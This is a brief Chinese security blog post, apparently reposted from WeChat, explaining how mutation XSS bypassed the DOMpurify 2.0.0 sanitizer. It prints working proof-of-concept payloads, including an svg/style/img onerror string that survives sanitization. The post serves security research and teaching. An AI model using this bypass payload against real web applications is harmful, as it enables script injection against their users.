Write-up of DOMPurify 2.0.0 bypass using mutation XSS
深入浅出浏览器渲染原理
<div>I am trying to be <i>malicious</i> <u>here</u>! <img src=1 onerror=alert(1)></div>
element.innerHTML = '<u>Some <i>HTML'
当我们的innerHTML=`<svg></p><style><a id="</style><img src onerror=alert(1)>">`
DOMpurify.sanitize(xxx.innerHTML); //框架过滤
的时候,经过框架的一顿骚操作然后被浏览器渲染应该是这样的
嗯 ,这样就离弹窗不远了,反正根据颜色 大家可以看到了吧。img标签被正常解析了,onerror也是。
然后作者给出了终极的poc,也就是
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
嗯。我今天刚推荐一个甲方同学使用DOMpurify……还行吧……
本文始发于微信公众号(xsser的博客):mXSS是什么?如何用mXSS绕过DOMpurify
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论